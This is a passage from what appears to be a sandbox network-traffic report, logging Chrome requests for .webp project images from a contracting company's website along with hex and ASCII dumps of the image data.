bf 10 9a ac 93 db 0b 65 df ee ff 36 6d 1b 07 9f c2 18 cc c4 ec
                                              Data Ascii: .ys\g&"? Z4hWk J}y1#>*xF,$-u8CKULB{oJ^p#u_9jqqHu1Q/NE)h0%G;7lH7:pS{W-0Bz3t_;@Jkz"J2X'JtD{e6m
                                              2024-09-27 06:20:18 UTC8000INData Raw: 7a bb 9b eb 04 9a 7b 76 3c 8d 1f 65 c9 bf d7 29 43 45 c4 f1 ea d4 3c bd 34 98 d2 3f 4a 17 1e 01 be 72 49 f2 b5 79 ed 91 de 78 07 7b 2f 1e 79 d0 e6 d4 41 c2 db a1 90 7f 05 0a e0 fc 43 11 11 06 63 14 da b5 6c 64 e0 78 64 26 61 c0 37 0f b9 45 ef eb 4f 6c 65 ba 74 21 e6 90 7c c8 62 b8 dc f1 a6 e5 ac 46 83 44 0d 65 10 cc 42 9b 2a 36 14 73 1e 6b d0 38 74 28 92 ac 83 a1 5a 44 c5 79 5e 3c a7 c3 18 a2 05 78 d6 5d 39 79 79 94 89 76 bf 2f b1 df 79 68 82 c2 ef 09 6e 1b d2 c0 e0 af b5 33 09 e0 61 11 ce 20 0d d7 52 01 6a ff 36 d1 f8 1b ce 92 49 c0 a0 e6 82 e8 9a 85 31 da 8e e0 8b 01 e6 9b e5 b9 4e 2f 61 a6 82 9b 83 d1 d6 44 df ab f5 3b bd e2 61 fa 07 ab e1 01 60 02 ba a8 a7 a3 73 44 d4 16 bd c2 98 22 54 9c b0 54 87 60 45 df 00 31 af a3 3e d8 0c 0c 10 99 95 43 12 34 bc
                                              Data Ascii: z{v<e)CE<4?JrIyx{/yACcldxd&a7EOlet!|bFDeB*6sk8t(ZDy^<x]9yyv/yhn3a Rj6I1N/aD;a`sD"TT`E1>C4
                                              2024-09-27 06:20:18 UTC8000INData Raw: 97 12 a6 6e 40 8e 7d 18 bb de 69 1b 52 0c 33 3b c6 c6 00 38 97 de 1d 1f 05 37 f9 17 4d 26 9e 06 05 18 64 9e 85 27 57 1c 14 02 e9 85 d1 89 2d 23 5c 64 70 01 a0 6e 17 3f 98 02 63 a1 9b 74 43 84 3b 02 a8 2d 56 15 4a 8e d4 2b f3 d0 ed f3 1b d0 29 fe d5 04 ad 33 80 82 fe 62 77 97 28 05 83 e6 ae d9 9f d1 3c 27 40 00 05 20 22 f3 75 ae 24 47 fe 1c ac a6 c3 c1 dd 90 c6 06 59 38 5a a7 8e ae d5 0a 1b 75 92 1a b6 d7 a0 86 58 d5 5d 7a 3d 73 ea 7f a5 6a d7 ba 76 cc da 14 12 91 b5 d3 4b 5c 21 7e b8 71 0f 26 6f 0d 51 35 db 10 41 95 a9 a4 13 35 31 40 23 de a7 56 a3 1c 81 3b 59 64 aa 1e ec c7 e8 eb 4b 90 46 e1 43 63 88 54 2c 1e 59 5f 22 03 ed d2 e7 63 1a 1b f4 f6 1d 2d 65 5a b6 0d 78 b7 7c 30 53 05 df 77 8a 44 1b 92 25 97 40 bf 26 5a 88 b3 ef 37 41 c9 00 9b 2b e7 1c 20 c4
                                              Data Ascii: n@}iR3;87M&d'W-#\dpn?ctC;-VJ+)3bw(<'@ "u$GY8ZuX]z=sjvK\!~q&oQ5A51@#V;YdKFCcT,Y_"c-eZx|0SwD%@&Z7A+
                                              2024-09-27 06:20:18 UTC8000INData Raw: 7d 65 53 d6 0f 3c e7 4a 3f 77 95 1a 9c 5a 15 b7 89 98 60 e8 f9 00 5e 77 6d 2c 19 28 ee a3 34 e2 4a 2c 19 52 80 cc 13 ee ad 94 da ca e2 e6 27 2f e8 93 68 79 61 57 50 5c bb 4d 3e 49 44 f5 08 b0 a0 66 be a3 bd 35 7c 51 65 e9 7c f5 82 78 9f db b9 4f c4 87 09 9c 96 a4 fe 09 19 b2 26 7d 08 f5 25 e8 0a d7 93 5a c7 d7 43 c3 9b ab 3a 9f b1 21 30 00 91 e0 fe 78 d5 79 3a 1a 02 ce 2e a1 fe 82 be 5e 18 c5 f7 09 fe 9f 92 2d a5 b5 a0 42 66 f8 8c de 59 4b 84 24 0c 3e e2 e1 d6 78 eb 2b cb 4f 38 fa 99 3d e6 35 29 b2 68 d5 be b9 4c bd 61 dc 98 c4 aa aa 90 be ae c6 d8 ca e7 eb 7d 87 34 f9 96 21 ca 4d 0f 58 73 9f 60 5e e9 bd 47 0f c2 64 a6 5c 68 49 4c c1 27 ea 01 de 3d 27 b5 1d 72 44 ff 30 c2 0a 8b e1 16 9e 6d 5e 81 7b 8f 1e 3e 9f 18 6f 78 77 4d f8 d1 6d ee 96 1c b8 1d 73 0e
                                              Data Ascii: }eS<J?wZ`^wm,(4J,R'/hyaWP\M>IDf5|Qe|xO&}%ZC:!0xy:.^-BfYK$>x+O8=5)hLa}4!MXs`^Gd\hIL'='rD0m^{>oxwMms
                                              2024-09-27 06:20:18 UTC8000INData Raw: 3c 8a fd 18 47 7b 85 2c ec 7d 9b 20 6b 72 d2 25 27 d0 51 72 e7 7a 71 bb 94 8c 72 df 2b 55 40 59 c1 5c ca 68 24 33 28 64 cc 2d 86 85 44 ec 5d 79 04 be f1 3b 05 8d 21 67 ef 2c ac b6 00 fd af de 88 41 9d c5 b0 65 02 95 8c 3d 8a 38 09 9e 84 60 0c 91 91 27 22 93 cc e9 a9 92 6d c1 3e d1 0f 02 dc e0 48 eb 3d 56 99 bb 75 e6 8d 01 4a b6 53 70 94 79 3b 73 c1 94 0e eb 13 f5 d1 43 db b2 0e 26 e4 3d fa 54 bf 5d 76 91 25 d1 5a 23 2c c7 07 7f f4 80 c1 3e 32 a0 99 6d 83 39 1c 36 a6 7e 07 4b 7f c9 93 98 6f ba bd 32 9e 66 9d 1f fb 8d 67 bb ce 2f 11 37 30 0e 7d c4 7a b2 83 9f ec 7a 8a de 14 55 4b 87 16 79 57 fe 52 af 28 c7 90 a9 34 ac 97 95 b4 d9 8e ed 88 4c 8a b9 b6 bd 7e 56 b3 cf 1d db 9b a7 b3 95 47 dc 02 a3 6c 0b db 9e 15 37 b8 25 b9 db 0a a2 ab 19 1c b4 04 ca a2 b7 a5
                                              Data Ascii: <G{,} kr%'Qrzqr+U@Y\h$3(d-D]y;!g,Ae=8`'"m>H=VuJSpy;sC&=T]v%Z#,>2m96~Ko2fg/70}zzUKyWR(4L~VGl7%
                                              2024-09-27 06:20:18 UTC251INData Raw: cd bd a2 1b fa 3f 41 05 06 e6 ae a7 39 d1 26 a1 53 b9 b1 72 1e 0b ff 71 de 4f 33 55 46 e0 9e 72 4d 19 03 cc 0f b4 91 7b 00 00 62 b3 c2 17 5a 81 ec 40 08 00 32 19 d3 e0 02 40 d4 01 16 bb c2 66 9d 3c f0 de 7f 0f 0a 3f b8 59 0c 6a b2 9b d5 bc 9a 7c 58 77 35 20 1e bd 94 b8 b2 e8 1c d0 dc 32 1e b3 a9 20 50 07 d2 5b d6 c6 8e 5b 23 63 11 53 7b 86 de a0 a2 93 f8 86 07 a9 53 e9 b1 d1 95 24 b8 e7 4c 90 9a a7 72 92 5c 57 f1 0c 13 26 48 72 80 89 d3 83 d7 10 82 e7 2b 6b 8a c2 ee cf 52 2f 14 5f 80 00 00 50 53 41 49 4e 00 00 00 38 42 49 4d 03 ed 00 00 00 00 00 10 00 48 00 00 00 01 00 02 00 48 00 00 00 01 00 02 38 42 49 4d 04 28 00 00 00 00 00 0c 00 00 00 02 3f f0 00 00 00 00 00 00 38 42 49 4d 04 43 00 00 00 00 00 0e 50 62 65 57 01 10 00 06 00 2a 00 00 00 00
                                              Data Ascii: ?A9&SrqO3UFrM{bZ@2@f<?Yj|Xw5 2 P[[#cS{S$Lr\W&Hr+kR/_PSAIN8BIMHH8BIM(?8BIMCPbeW*


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              108192.168.2.465445173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:18 UTC724OUTGET /uploads/projects/32/a5af5c8ac06932758cc7ca886fdabf1b.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/projects
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:18 UTC262INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:18 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 12:02:11 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 147556
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:18 UTC7930INData Raw: 52 49 46 46 5c 40 02 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 e8 3f 02 00 d0 00 07 9d 01 2a cf 04 a3 03 3e e9 64 a9 4e a9 25 a8 af ac db a9 d1 f0 1d 09 4d db 97 5b 8b e3 78 68 fd c7 66 d4 af 14 68 0f ce 9f f8 fc e0 3f 79 d3 5d 9b fa a6 7b 81 11 f8 11 c2 ac 2d 9d 55 19 f1 6e 51 5c 7d bb e5 e4 7a 5b 0f 79 b2 c8 30 b3 1f 1d fd e3 3d fe c9 76 c6 68 7c 6c f9 df fd 3e 6f 7f 03 df 9b ff 3f ac 8f ee 9f f2 fd 86 7f b8 fa 33 f4 d5 e6 83 f7 87 d6 bf d1 d7 fa ff b8 0f 91 0f f1 de 9a 3e ab 7e 85 bf b7 5e b5 5e ac 9f e6 bd 25 7d 00 3f ff fb 62 ff 00 ff fb d6 4f e6 be 4b be 8f fd 3f 7b 7f 9f fd 8b fc 9f f1 9f e9 bf fb fc 62 7e f7 8d ff 87 ff 43 cc 8f eb 1f b1 3f e1 f7 a9 f3 97 fb 2f db 4f 17 7f 58 fe 4f f6 7f d8 23 df 1e 74 ff 81
                                              Data Ascii: RIFF\@WEBPVP8XVP8 ?*>dN%M[xhfh?y]{-UnQ\}z[y0=vh|l>o?3>~^^%}?bOK?{b~C?/OXO#t
                                              2024-09-27 06:20:18 UTC8000INData Raw: 47 27 ed e0 61 6e 3d 64 34 55 ec 56 60 a2 f1 e1 80 fa 78 ed d5 6d 12 3e 32 7f 97 2b 54 04 ac ec 5a d6 97 0b f8 ee 46 5f 63 39 d9 88 11 87 08 cd ad c9 8d 92 39 bb cd fa 5e d2 3e 70 49 52 a9 4f 4e 77 57 69 98 33 57 7e dc 9b a1 79 00 7e f7 22 2d e2 71 51 88 28 78 01 53 b1 05 cb 10 e8 5d 67 41 7c 7a 18 49 87 e9 8b 46 e8 7d f9 17 f4 e2 af f1 43 80 0e c0 2d fc 8f 8f 53 09 23 bb a4 c2 ae 2d fe 2d be 1b d1 92 04 c3 4a c8 a3 44 42 bb 3f c5 c5 7e 01 69 0c 65 17 3d a4 5d 05 c3 e1 32 b0 14 87 7a 2b 60 9e 1e b5 71 b3 a7 0c bd bb f9 2f be 0f 2d fa 8f 10 86 bb 1d 38 71 5d de fc 9d 95 99 1b 15 28 f0 5c f8 52 af c9 58 da 11 e9 cd 7c 00 0b 62 ad f7 09 61 a5 79 d5 44 a7 b9 b8 ec 43 fc 1f 3a 5d 21 26 da 7d 4d 83 78 5b 84 72 03 0e b1 86 e4 c4 21 3a 12 1d 89 5b e9 a0 6f 7d a4
                                              Data Ascii: G'an=d4UV`xm>2+TZF_c99^>pIRONwWi3W~y~"-qQ(xS]gA|zIF}C-S#--JDB?~ie=]2z+`q/-8q](\RX|bayDC:]!&}Mx[r!:[o}
                                              2024-09-27 06:20:18 UTC8000INData Raw: 8c be c0 8b fb 58 bf 6f 44 21 a4 75 01 1e 3d 3f f3 e2 87 d1 56 0e 36 97 31 a4 0a e1 07 97 f9 60 61 86 f4 16 57 c7 ff 7a 24 76 f9 61 61 e8 59 92 8c a4 5e 10 69 54 6f 34 d3 fd 54 65 29 df 86 27 93 c0 01 a0 4b bc 92 72 28 f4 d6 c0 00 29 f0 05 01 90 6e ec 84 37 33 31 1c b3 98 09 2d 9f c8 e0 7b e8 e3 f8 8d ad 97 58 31 8d 0d 11 8f 63 02 50 63 bb 7a db 9b 70 4e ab df e9 e2 c3 57 3a dc 60 d1 01 a6 d1 00 9a 53 07 b9 ad e1 37 a1 ca ac b6 34 bc 64 53 c3 8c 47 b2 9c 79 d7 d2 b8 4a 03 4e 26 be 4a b7 11 48 77 94 21 93 95 c9 a0 82 c2 24 e0 73 7c b5 0e 80 98 0f 93 6c cf 9a 7c bd 6d e6 13 93 39 8e 8f 94 d7 58 6e e2 ae 11 b2 81 9d 43 19 dd d8 ff 20 cf 49 b3 4e 71 77 75 ec 6c 38 d3 1a 94 45 9f 8f 14 75 f9 57 ef a3 05 53 9e cd 4a 67 61 02 94 49 21 df 04 3c c2 67 aa af 5d 3d
                                              Data Ascii: XoD!u=?V61`aWz$vaaY^iTo4Te)'Kr()n731-{X1cPczpNW:`S74dSGyJN&JHw!$s|l|m9XnC INqwul8EuWSJgaI!<g]=
                                              2024-09-27 06:20:18 UTC8000INData Raw: a2 f8 42 d9 d7 d0 cb b1 39 82 35 8a f2 e5 75 25 9a 15 52 c3 73 72 c0 d2 f8 a8 65 ce 7c 8c c2 12 3f 53 f7 43 b7 2e 21 9a bc 0d 22 d4 65 a1 63 ea 03 5f 30 40 66 45 2c c9 b1 1e aa 51 c0 87 31 7a aa fc 4f 3f d2 2a 6c 27 d8 09 c7 dd e0 f6 8a 6d 4d 6d d2 c4 32 33 6f 31 09 19 62 42 52 9e 49 81 ce 16 fa 64 bc b2 db 69 5b 8d 7c 1c f1 10 2f 8a db e0 c1 f4 ae 72 f1 45 ea 2c c9 a5 30 9b a4 d9 a6 dc 72 92 e5 4e ba 63 a5 ba cd 56 68 16 f3 b7 7f da 93 c0 e4 ad eb 5b 96 3d cf 3f 65 f3 5e 93 26 32 e4 24 fd 0c b9 3e 92 c4 85 78 6a 3c b5 80 82 f1 20 a3 56 d4 eb 80 9b a5 7a 5a 09 55 86 34 fd 99 72 94 8c a0 cd 0e b8 aa 03 d8 6f 3f cf fd d5 53 f8 78 b0 f5 1e 2d d4 7f 97 59 55 8f ec 1f e3 d0 50 8c 4f e7 bc af 9b 4c 30 a6 48 40 a3 d6 ed c3 57 6e e5 40 5f 0e 67 99 c8 d2 5a 46 db
                                              Data Ascii: B95u%Rsre|?SC.!"ec_0@fE,Q1zO?*l'mMm23o1bBRIdi[|/rE,0rNcVh[=?e^&2$>xj< VzZU4ro?Sx-YUPOL0H@Wn@_gZF
                                              2024-09-27 06:20:18 UTC8000INData Raw: 66 3c 3b a0 ab 58 06 1a 81 5c 2e 4f 83 a9 e0 9b 3c c0 b7 ea d6 42 fd 12 86 a7 fd 4d 47 9c e6 48 9c 71 07 17 16 f2 8e f0 19 e5 79 6c 83 60 e9 64 2e 46 93 be 76 51 1b 08 b1 5c 2a f5 71 d9 7a 12 8d 95 2b 47 bb 1e ec 40 e1 f4 ee b3 71 61 e7 b2 e7 6c b9 94 dc f8 8f 9d e7 89 9b 45 c2 1b 34 f2 f4 4b 8d 60 f8 88 78 b3 2d 02 8e b7 ac 32 2b 74 d3 6a db 81 76 88 fe f7 88 0b 75 db 3f b3 d2 41 e3 0c e7 55 28 bf 34 36 5f b2 34 94 d2 a9 b1 92 38 c4 6b e3 4f c7 37 08 96 6f 61 54 86 dd 8f 57 d9 5c 5d 08 0d be fd 04 08 db 66 e7 5e ef 4f 77 d6 b6 70 4c 58 e6 a9 c5 df 31 f3 19 6e 01 e2 06 89 4f 35 3c 76 3c 0a 91 82 94 84 6c a2 38 83 a7 af a6 27 22 4e 9f d7 b6 1d ad 2f 51 77 a6 42 09 bc 9d 42 73 5f 2f 2f de 16 fa af a9 d5 80 5a a1 4c 18 b8 f0 96 58 ad 9d 36 a4 68 f4 14 c7 52
                                              Data Ascii: f<;X\.O<BMGHqyl`d.FvQ\*qz+G@qalE4K`x-2+tjvu?AU(46_48kO7oaTW\]f^OwpLX1nO5<v<l8'"N/QwBBs_//ZLX6hR
                                              2024-09-27 06:20:18 UTC8000INData Raw: 73 9f cd 86 ee a9 e4 6c 07 97 ab 78 99 b0 e1 e1 42 b4 22 65 07 c6 1c 70 bd 72 64 93 4b 9d 61 b3 e5 22 ce 2a f1 89 46 b1 35 e0 26 87 9e 9f bf 69 e4 ab e8 48 0d d0 a8 2e e7 a4 13 b7 d3 d1 de 0e 09 f7 48 de 7b 8c a4 49 37 41 21 27 9a 05 ba ab b3 21 e2 e1 23 cf 5b 6b af 78 16 50 13 ef 08 f4 ed 5d 8e cc 85 f6 af d6 7a 94 d3 2b 13 44 d7 52 2c 40 06 03 a5 36 7d 79 be d8 58 4f 11 e0 e1 8e 7c 9e 18 6a 84 94 5a 95 05 44 fc 45 71 3e 07 ba d7 80 12 4c 20 25 f9 8d fe 10 25 03 15 5b d7 f4 0f 58 96 46 8f f5 26 66 a3 66 e8 da 43 5d 87 cf a9 11 37 9b 51 a8 18 d5 19 f2 1b 7c 73 b4 28 ca 82 31 ef ae 0a 19 68 9e 4e 8b eb c5 47 8f fc d8 a2 dd 48 61 25 91 29 3b 48 76 d9 0f ab fb 94 ff 2f 36 84 be a7 27 a1 5a 36 fb f5 25 52 03 eb 5f ae e4 4f c4 ef ad ff de a8 ea 7d c5 2d 18 fc
                                              Data Ascii: slxB"eprdKa"*F5&iH.H{I7A!'!#[kxP]z+DR,@6}yXO|jZDEq>L %%[XF&ffC]7Q|s(1hNGHa%);Hv/6'Z6%R_O}-
                                              2024-09-27 06:20:18 UTC8000INData Raw: 14 ea 92 fb 85 7e 36 0d da 63 e0 a3 a9 2a 6d cb d6 2d ab 4f f4 2a a3 ea 16 92 52 65 d6 e2 ee aa 17 dd 0c ca 34 14 d3 7f 9a 23 b4 23 34 59 8d 13 59 89 25 99 04 db 18 41 31 96 60 60 5f f8 e0 07 ff 91 5f fc fe da 74 a7 57 fe c6 44 a1 e1 29 cd ad 0b e7 f5 6d 32 c8 66 a4 1b 83 6a dd b7 d0 fb 1e 51 12 a1 5a 0d 8c 5a 4c 42 27 55 74 f9 90 01 8d 66 c3 c9 f5 a2 eb 00 86 89 23 d4 cf 50 77 4e c0 ad 47 c5 02 69 96 f4 6d 7e b7 64 18 1d 35 a3 4e 30 99 44 bb 94 ae 1a 36 32 cf d8 ca 6a f9 90 fa a7 57 c4 a7 89 25 03 aa 85 4f 04 47 46 ac d0 a8 5a 8c 56 08 87 97 05 94 9b fd 45 c1 4e a0 e3 99 02 87 bb b4 e8 7a ce b9 30 da da c5 b9 af 98 0b ff c4 5c 78 0e bf 49 59 28 0a 7c ab 55 70 0f 1e c7 6b 95 71 02 63 4e 10 f5 4f 00 86 28 cb 02 e6 54 8c 71 16 83 dc 93 bb e3 d5 d8 c2 56 02
                                              Data Ascii: ~6c*m-O*Re4##4YY%A1``__tWD)m2fjQZZLB'Utf#PwNGim~d5N0D62jW%OGFZVENz0\xIY(|UpkqcNO(TqV
                                              2024-09-27 06:20:18 UTC8000INData Raw: 58 72 63 fa b7 6e 64 de 82 c0 e6 d3 09 75 d2 90 29 04 20 57 1f 7c b3 16 d8 6a 81 9d 18 8e 1c f5 db 59 6b b6 a3 37 7f 36 8c 2c 0b 9c 5a 76 e1 a7 8f bb 8c 5a 46 f1 b6 cc 84 32 08 be c7 a3 35 c8 29 3b be 9c fd f5 6b fa 78 b1 85 b7 06 8c 96 af 7c 42 3e 8e 27 84 5f 4d 39 01 e0 cb 72 2f 79 e6 66 12 22 a2 da c5 91 84 b6 b4 34 50 cf 50 be 72 a2 9e 76 6c 22 15 b1 17 60 e8 83 cd fd c9 0a f9 b0 9e 91 ad ba a8 1f ee d5 36 9d 1b 90 67 38 09 48 de b9 c8 0d 0d 35 67 94 80 ce 19 74 76 86 38 f3 67 83 a8 fc c6 5a 9f a1 c9 6c 4d a6 e4 07 d5 82 27 05 c7 72 bb 0c 1b e3 fe 2b 9f 75 20 35 47 9a 7e be 07 c1 45 20 b8 fd 4c ba 95 39 b8 5b fe 82 20 59 91 91 42 e0 a2 ac bc 57 d1 64 e7 81 77 24 b7 44 0a b4 e3 c0 cf f8 e8 80 e2 b0 54 9e b3 65 9b bf 9b 3e 03 0a 84 97 5d b5 ff 9d 39 cf
                                              Data Ascii: Xrcndu) W|jYk76,ZvZF25);kx|B>'_M9r/yf"4PPrvl"`6g8H5gtv8gZlM'r+u 5G~E L9[ YBWdw$DTe>]9
                                              2024-09-27 06:20:18 UTC8000INData Raw: ab a2 fc 20 62 f5 1a 03 72 12 5b 23 e3 bd 56 a2 d5 db 46 aa 2c 8d 26 2b 8d 0e 29 c9 52 65 6c ed e5 51 5d 7b 17 12 6a 68 5a 9e b0 a3 89 b7 de 49 70 51 6e 08 49 10 20 75 a1 5a 9e bc 1a 0f c0 55 2c 33 3a e0 e7 9d 17 c3 da 59 c4 c6 69 6e 5e 3a 12 09 b9 c9 2a d7 f3 e8 44 dd 6f b2 0e cd 1b e6 a1 0a d8 6b 00 44 b1 fb c8 23 2c 44 69 49 c2 31 0e aa 24 e0 1c 3b a7 9b 11 64 ec b6 a4 5c ae 9a b7 39 74 2d 76 f7 0c b0 49 6f 4f 7f 84 1f 3a ab 0c 53 7d 6e f2 29 b5 ad 02 41 49 e3 b6 eb 7c 24 a2 49 06 fd 39 c7 fb 29 04 7d 59 45 91 32 c6 d3 ec b9 fd b0 2c 2c 48 da 9a a4 fa 63 43 3a fa 60 aa 98 7c 9d 4d ee fd da 4a 6f 25 79 4f 51 73 da 31 6d 09 d8 30 44 52 59 53 8e 8f e6 51 17 b0 d4 62 5d de 68 8b 2e ef 1b b3 47 02 73 c4 1e c4 89 85 a2 34 8c 40 b1 79 69 06 be 3e 31 56 89 10
                                              Data Ascii: br[#VF,&+)RelQ]{jhZIpQnI uZU,3:Yin^:*DokD#,DiI1$;d\9t-vIoO:S}n)AI|$I9)}YE2,,HcC:`|MJo%yOQs1m0DRYSQb]h.Gs4@yi>1V
                                              2024-09-27 06:20:18 UTC8000INData Raw: b6 95 db ed e4 1a 80 fa 11 9c 2d 92 fa 57 a7 f2 1f c6 52 2b 37 aa e7 31 be 35 84 24 3d 6f b0 d3 2a 42 29 24 a2 a6 9b 19 45 e1 6f 75 53 6b 48 d0 41 8a ab 35 f9 97 3d b8 2a ff a4 2c 52 45 68 13 99 1f 30 3f 88 d0 4c 24 31 a4 01 88 42 8c b0 0b b5 96 a6 f4 0f 69 ad 5d a1 5e 2a d9 00 c2 83 78 05 e2 60 ef af d8 55 ef 74 8f db 3a e4 4a 5c da 55 cb ad a5 53 cd 7f 77 f6 d6 38 59 05 59 12 a7 38 1c ab cc 80 68 0f 17 e8 d6 91 44 6d 86 7f 2f 81 85 5d 87 c6 86 5e 94 b9 67 98 15 78 c3 56 55 48 0d 81 dc a0 4b 6c cb ff da 69 cb 89 9e 69 21 77 d1 f4 f1 bf 55 ca a2 4a 38 54 9c 11 92 81 21 f8 2c c8 ad 1d d1 2f 14 bf e3 71 af fc 35 73 f1 42 ec 6d ad a6 7b f9 5f 54 c2 09 f5 d7 01 30 2a ee 86 82 4c 21 d6 85 47 82 98 9c a3 a5 fe 75 20 33 e6 58 82 d7 a4 57 12 c9 43 dd 36 f1 10 78
                                              Data Ascii: -WR+715$=o*B)$EouSkHA5=*,REh0?L$1Bi]^*x`Ut:J\USw8YY8hDm/]^gxVUHKlii!wUJ8T!,/q5sBm{_T0*L!Gu 3XWC6x


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              109192.168.2.465444173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:18 UTC465OUTGET /uploads/projects/17/e7dd25a6640aa7bddcdaf018fbb5a7f2.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:18 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:18 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 10:53:04 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 43004
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:18 UTC7931INData Raw: 52 49 46 46 f4 a7 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 80 a7 00 00 90 eb 04 9d 01 2a cf 04 a3 03 3e e9 70 b0 51 a9 32 3f b2 a7 13 4a 73 f0 1d 09 65 6e 88 d8 a2 f0 de 69 ed 06 67 ca eb c8 c7 de 6a 5f 0e 38 cd 77 60 cd e0 fc 85 7b ce 41 08 61 a5 5b 6a df a8 3f eb f3 3e cd 1d c0 b4 a3 c8 3e fc 90 3f 75 f3 bb f6 ae f6 7e 55 6e b8 e3 d4 dc 1b ff e6 f3 ed f3 6f f2 7f fb 77 3d fd 17 fe 9f e8 fd aa 7f d2 fb c7 d3 e7 c8 7f e3 e3 a7 fb c7 ff ff ef fb 4d ff 8b ff ff 9b ff 40 ff ff f5 9e fd ab fa a7 ff ef eb be 5d 3c af af af a3 ef 9a bc 3d b7 18 fc 27 ff 3e cb 7f f1 bd 39 f5 11 3b 8f ff 5e a1 bf 44 ff c8 4c 78 99 e0 fc 7f a3 dc a6 cc ac 36 27 7d 61 05 94 3d c8 fb fc a1 cf b8 16 25 be b4 da 2d 86 eb f9 24 da 52 29 61 90
                                              Data Ascii: RIFFWEBPVP8XVP8 *>pQ2?Jsenigj_8w`{Aa[j?>>?u~Unow=M@]<='>9;^DLx6'}a=%-$R)a
                                              2024-09-27 06:20:18 UTC8000INData Raw: 5a b5 db f9 36 11 0d b1 f5 03 f7 ba c9 93 1a 4f 5b 46 73 20 95 92 c8 9b 67 1e 90 38 76 06 39 f0 08 6d 44 bf 79 ce aa c4 3e 45 0b 17 64 b7 68 4f 5c ae 7f 33 3a e3 5a a3 f1 d0 a6 16 c8 b5 21 a0 67 25 b1 30 db 3c 53 cd 04 06 57 c9 b9 c7 a8 8c 8f 04 3c cb 5b 69 90 86 f1 a1 54 5b 2b b4 47 da a9 99 06 57 ef 69 94 79 ba ab 83 b9 99 15 cb 4b 7b 48 2b 5c c5 4e db 3b 36 99 ec f9 70 12 8d c4 69 5e 2e e1 86 1a 0a fb 66 79 b7 fd 00 18 fc 81 31 24 9d 79 aa 17 74 41 2b a9 d0 03 8e be 93 05 9d 60 bf c1 b9 a6 a9 00 09 b7 06 2a 20 96 ae b1 b0 5c 25 79 31 92 92 fb ba c5 17 74 ac 43 bc 5c 03 0f 5a 1f a1 2e 2d 2f 22 d4 17 2b dc 63 ba 40 4f 1d 95 14 9d 2a d7 fc ac da 5a e4 31 ac 38 7d 44 52 17 80 f9 7b ad a8 d9 7e c3 a9 a5 4f 72 aa f1 de e0 75 8d e0 07 63 e4 65 b1 4f 06 4f 63
                                              Data Ascii: Z6O[Fs g8v9mDy>EdhO\3:Z!g%0<SW<[iT[+GWiyK{H+\N;6pi^.fy1$ytA+`* \%y1tC\Z.-/"+c@O*Z18}DR{~OruceOOc
                                              2024-09-27 06:20:18 UTC8000INData Raw: 45 1e 13 67 d9 23 67 56 c8 c9 82 e8 c9 9b a0 cc fb 0f 05 89 86 25 c3 59 9f 38 10 86 13 51 1b a3 7e 16 47 81 2b 8d 4a 78 a7 dc a6 01 02 a8 43 ca ca 6c 25 1e 01 bb 79 9f e6 47 ca d2 fc 2f 0c 75 4d 7e 95 56 38 89 d6 68 07 91 68 77 f8 d1 6d c2 14 5a e3 db 98 f0 cf d5 c1 2d 86 30 57 ef b6 3f 30 22 01 cf 67 49 e2 79 9b d7 ad 27 39 7c 7e 2c 49 3a 11 92 55 b3 91 47 44 5f ed 82 c8 cb 38 12 9a ca b2 4f 95 13 ed 1d 0b 6a e0 02 31 44 75 1a 45 26 62 11 52 46 d5 c2 7d 27 8c c1 4e 05 b5 48 96 24 c9 ed 92 a5 dc 01 95 09 db b6 8d 3e 55 70 b6 89 cb 98 14 2d c8 60 10 82 ba 9e 64 0e df 93 d1 d7 7d 6e ef eb 14 0a 07 6f 46 c0 9d e4 78 69 ef 80 23 e3 01 00 3b 47 8a 6a 0f 5c 32 e0 b0 d3 b0 3c 11 90 9a 6f 26 47 28 f4 ba 85 c3 e2 81 ba 07 5f 3e 7b 32 d0 69 c0 a3 32 67 47 5c 91 a8
